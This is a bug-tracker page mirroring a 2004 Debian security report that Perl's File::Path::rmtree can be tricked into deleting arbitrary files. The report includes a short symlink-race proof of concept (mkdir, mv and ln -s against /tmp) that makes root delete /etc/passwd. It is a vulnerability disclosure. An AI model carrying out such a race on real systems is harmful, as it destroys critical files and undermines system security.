perl-modules: File::Path::rmtree removes arbitrary
Bug #11409 reported by
Debian Bug Importer
This bug report is a duplicate of:
Bug #11407: perl-modules: File::Path::rmtree makes setuid.
Edit
Remove
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
perl (Debian) |
Fix Released
|
Unknown
|
|||
perl (Ubuntu) |
Invalid
|
High
|
Unassigned |
Bug Description
Automatically imported from Debian bug report #286922 http://
Changed in perl: | |
status: | Unknown → Fix Released |
Changed in perl: | |
status: | Fix Released → New |
Changed in perl: | |
status: | New → Fix Released |
To post a comment you must log in.
Message-Id: <email address hidden>
Date: Thu, 23 Dec 2004 10:00:00 +1100
From: Paul Szabo <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: perl-modules: File::Path::rmtree removes arbitrary
Package: perl-modules perl/5. 6.1/File/ Path.pm
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/
Tags: security
Justification: root security hole
Following on from the "File::Path::rmtree makes setuid" issue, I notice
that rmtree may be tricked into removing arbitrary files.
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir /tmp/psz
perl -e 'open F, ">/tmp/psz/$_" foreach (1..1000)'
touch /tmp/psz/passwd
While root is busy working on /tmp/psz (and this can be made as slow as
we like), attacker does:
mv /tmp/psz /tmp/dummy
ln -s /etc /tmp/psz
Root will then remove /etc/passwd.
Maybe it should be documented that rmtree must only be used if you can
be sure to have exclusive access to the tree.
Cheers,
Paul Szabo - <email address hidden> http:// www.maths. usyd.edu. au:8000/ u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information usyd.edu. au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction